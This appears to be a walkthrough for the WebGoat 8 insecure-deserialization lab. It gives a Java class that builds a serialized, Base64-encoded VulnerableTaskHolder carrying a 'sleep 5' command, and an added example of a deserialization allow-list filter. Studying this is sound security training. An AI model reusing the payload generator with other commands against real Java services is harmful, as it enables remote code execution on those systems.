WebGoat 8 - Insecure Deserialization - Lesson 5
1. Find the path to the end function's code.
Path: https://github.com/WebGoat/WebGoat/bl...
2. Locate the VulnerableTaskHolder class and focus on its readObject method.
Path: https://github.com/WebGoat/WebGoat/bl...
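//Main.java
package org.dummy.insecure.framework;

import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.util.Base64;

// Needs the VulnerableTaskHolder class from step 2 on the classpath, in this same package.
public class Main {
    public static void main(String[] args) {
        try {
            // The object whose readObject method the lesson focuses on
            VulnerableTaskHolder go = new VulnerableTaskHolder("sleep", "sleep 5");

            // Serialize it with standard Java serialization
            ByteArrayOutputStream bos = new ByteArrayOutputStream();
            ObjectOutputStream oos = new ObjectOutputStream(bos);
            oos.writeObject(go);
            oos.flush();

            // Base64-encode the serialized bytes and print them
            byte[] exploit = bos.toByteArray();
            String exp = Base64.getEncoder().encodeToString(exploit);
            System.out.println(exp);
        } catch (Exception e) {
            // Report serialization errors instead of silently swallowing them
            e.printStackTrace();
        }
    }
}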
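The defensive side of this lesson, as an added example that is not part of the original page or of WebGoat: a serialization filter (java.io.ObjectInputFilter, Java 9 or later) rejects an unexpected class before its readObject method runs. FilterDemo, TaskHolder, read and the sample value are hypothetical and constructed for illustration.

```java
import java.io.*;

public class FilterDemo {
    static boolean readObjectRan = false;

    // Constructed stand-in (not WebGoat's VulnerableTaskHolder): its readObject
    // has a side effect on deserialization, here only a harmless flag.
    static class TaskHolder implements Serializable {
        private static final long serialVersionUID = 1L;
        private final String taskAction;
        TaskHolder(String taskAction) { this.taskAction = taskAction; }
        private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
            in.defaultReadObject();
            readObjectRan = true;
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    // pattern == null: plain readObject(); otherwise the filter is consulted
    // for every class in the stream before any instance is created.
    static Object read(byte[] data, String pattern) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            if (pattern != null) {
                ois.setObjectInputFilter(ObjectInputFilter.Config.createFilter(pattern));
            }
            return ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        byte[] data = serialize(new TaskHolder("constructed-value"));

        read(data, null); // unfiltered: the class's readObject executes
        System.out.println("no filter, readObject ran: " + readObjectRan);

        readObjectRan = false;
        try {
            // Allow-list: list only the classes the endpoint expects, reject the rest
            read(data, "java.lang.String;!*");
        } catch (InvalidClassException e) {
            System.out.println("filtered, rejected: " + e.getMessage());
        }
        System.out.println("filtered, readObject ran: " + readObjectRan);
    }
}
```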
Published on 1400/03/11 (3 years ago).
Viewed 7,438 times.